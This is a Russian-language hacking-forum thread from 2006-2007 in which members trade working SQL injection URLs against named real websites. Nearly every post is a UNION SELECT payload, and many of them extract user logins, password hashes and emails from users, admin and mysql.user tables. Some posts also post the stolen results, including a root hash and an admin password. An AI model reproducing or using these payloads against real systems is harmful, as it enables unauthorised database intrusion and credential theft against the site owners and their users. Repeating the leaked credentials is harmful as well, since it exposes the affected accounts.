SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    _http://transauto.org.ru/index.php?id=-111+union+select+1,2,3,4,user(),version(),7,8,9,10,11,12,13,14,15/*
     
    1 person likes this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
     
    2 people like this.
  3. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://www.sa.lifebeinit.org/standard.php?id=-34+union+select+1,2,3/*

    http://www.solv.ru/snews.php?id=-60+union+select+1,2,3,4/*

    http://www.usta.de/standard.php/RefAk/Kultur/termine.html?id=-475+union+select+1,2,3,4,5,6/*

    http://www.multaqa.org/etemplate.php?id=-948+union+select+1,2,3,password,email,6,7,8,9,status,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*

    http://www.unitedagainsttorture.org/etemplate.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

    http://archaeolog.ru/?id=2&id_nws=-16+union+select+1,2,3,4,5,6,7,8,9/*

    http://www.self.by/current_seminar.php?id=-10+union+select+1,2,concat(user_email,char(58),user_icq,char(58),user_password),4,user_password+from+phpbb_users+limit+1,1/*

    http://upack.by/articles.php?id=-148+union+select+1,concat(login,0x3a,password),3,4,5,6+from+users/*

    http://mp3search.by/artist.php?id=-57258+union+select+1,concat(login,0x3a,password)+from+admin/*

    http://www.businessconsult.by/pub/?id=-3+union+select+1,2,3,4,5,6,7,8/*

    http://www.itc.by/job/index.php?id=-73+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

    http://jafi.by/programs.php?id=-6+union+select+1,2,3,4/*

    http://www.mvp.gomel.by/news.php?id=-120+union+select+1,2,3,4,5,6,7/*

    http://www.v4.by/index.php?n=news_&id=-1570+union+select+1,2,3,4,5,6,7,8,9,10,11/*

    http://www.pogoda.by/glossary/?nd=1&id=-5+union+select+1,2+from+mysql.user/*
     
    1 person likes this.
  4. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    http://www.smalldog.com/mydog/number.php?id=-1+union+select+convert(version()+using+latin1)/*
     
    1 person likes this.
  5. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.sportexpo.ru/print_base.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4/*
     
    1 person likes this.
  6. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Code:
    http://www.dance.lt/news.php?strid=2871&id=-4244+GROUP+BY+A.id,A.title,pd,pt,A.lead,A.body,A.pic_alt,A.pic_capt,A.pic_l,SNS.name,SNA.name+union+select+1,2,user(),version(),5,database(),7,8,9,0,1,2,3/*
    Доступа к mysql.user нет
     
    1 person likes this.
  7. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    http://www.dance.lt/news.php?strid=2871&id=-4244+GROUP+BY+A.id,A.title,pd,pt,A.lead,A.body,A.pic_alt,A.pic_capt,A.pic_l,SNS.name,SNA.name+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,0,1,2,3+from+users/*

    Так лучше)))
     
  8. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.ceylonam.com/adm/list.php?ID=39+union+select+1,2,3,concat(password,0x3a,username),5,6,7,8,9,10,11+from+login/*
    
    http://www.ceylonam.com/adm/
    пасс в чистом виде


    http://www.ceylonam.com/adm/list.php?ID=39+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES/*имена таблиц

    Code:
    http://www.marubeni.lk/html/html/alpha/sltb/lang/en/gallery/preview.php?id=49+union+select+1,2,table_name,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+139,1/*
    139 таблиц 0_О)))
     
    1 person likes this.
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ()_o Кто знает как заюзать иньекцию в Front Base вот вам ссылка ^
     
    2 people like this.
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Может и было...

    Code:
    http://www.nettour.ru/?c=tb_articles&arid=-1+union+select+1,concat(name,char(58),pwd)+from+user/*
     
    2 people like this.
  11. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    с таблицами беда =\
    Code:
    http://www.gridcc.org/viewparticipant.php?id=-1091+union+select+1,user(),3,4,5,6/*
    А вот здесь все очень четко и грамотно, это я называю -идеальная скуль))
    Code:
    http://www.gs-energy.com/news.php?id=-53+union+select+1,user,password,4,version(),6,7,8,9,10,11,12+from+mysql.user/*
     
    7 people like this.
  12. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    http://www.lygus.lt/ITC/verslas.php?id=-20+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5/*

    http://games.lala.lt/cats.php?id=-7+union+select+1,version(),3/*

    не улыбнуло(((

    http://www.terasz.hu/terasz.php?id=galeria&page=sorozat&sorozat_id=996+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+limit+2,1/*
    Просмотр таблиц лимитом!

    http://www.terasz.hu/terasz.php?id=galeria&page=sorozat&sorozat_id=996+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user+limit+1,1/*

    root:*8E6C3D25857494FD7339B819E6661B6F45FFB320

    улыбнуло :D
     
    #1112 XTErner, 17 Mar 2007
    Last edited: 18 Mar 2007
    2 people like this.
  13. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://www.artiks.ru/consultant_text.php?id=-4376+union+select+1,2,0x50726576656420616E7469636861742779,4,5,6,7,null,9,10,11,12,13--
     
    4 people like this.
  14. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Code:
    http://money.rin.ru/content/?id=-1+union+select+1,concat(USER(),0x3a,VERSION()),3,4,5+from+mysql.user+limit+0,1/*
    Code:
    http://www.famajor.com/index.html?ID=eshop&select=-1+union+select+1,2,3,USER(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/*&lb=P-MONEY
    
    Code:
    http://russiantopics.com/money/moneytxt.php?id=-1+union+select+1,concat(username,0x3a,password,0x3a,email),3,4,5,6+from+users/*
    
     
    #1114 VampiRUS, 18 Mar 2007
    Last edited: 18 Mar 2007
    2 people like this.
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    www.itartass.ur.ru
    5 версия, 103 столбца, ничё интересного не нашёл 0_о
     
    2 people like this.
  16. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Может и было...

    Code:
    http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13/*
     
    3 people like this.
  17. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*

    Ты наверное хотел сказать 103 таблицы))) ;)
     
    #1117 Colkru, 18 Mar 2007
    Last edited: 18 Mar 2007
    4 people like this.
  18. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    _cwhost.ru
    Code:
    http://cwhost.ru/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pass,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15,16,17+from+nuke_users+limit+0,1/*
    хостинг какой-то... :D кривой.. при попытке зайти бросает на valuehost, мб подкомпания... дальше не смотрел, т.к. сайт не грузится что-то :(

    webstudent.ru
    Code:
    http://webstudent.ru/modules/wfsection/article.php?articleid=1020+and+1020=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    там xoops 2.*
    таблица вроде users называется, префикс по умолчанию - xoops. но в данном случае другой :) не стал копаться..
     
    #1118 n1†R0x, 18 Mar 2007
    Last edited: 18 Mar 2007
    5 people like this.
  19. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.fiat.com.ro/carinfo_galerie.php?id=-17%20UNION%20SELECT%201,2,concat(user(),0x3a,database()),4,5,6,7,8,9/*
    Code:
    http://www.eliberadio.ro/show.php?id=21+union+select+1,version(),3,4,5,6,7,8,9,10,11+limit+1,1/*
    Code:
    http://www.romanicriss.org/noutati.php?id=-13%20UNION%20SELECT%201,2,3,4,5,password,7,8,9,10,11,12+from+users/*
    Code:
    http://www.istyle.ro/categorie.php?id=-97+union+select+1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
    pass:4ef35e0e3f1db2c1
    user: sqladmin
     
  20. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.wargames.ru

    Code:
    http://www.wargames.ru/sections.php?op=listarticles&secid=-1+union+select+1,convert(concat(name,char(58),pass),char),3,4+from+users/*
    Вот только ни как юзер, ни как админ зайти почемуто нельзя.


    www.splav.kharkov.com

    Таблу не подобрал =(
    Code:
    http://www.splav.kharkov.com/choose_mat.php?class_id=-1+union+select+user()/*
     
    #1120 Ksander, 18 Mar 2007
    Last edited: 18 Mar 2007
    1 person likes this.
Thread Status:
Not open for further replies.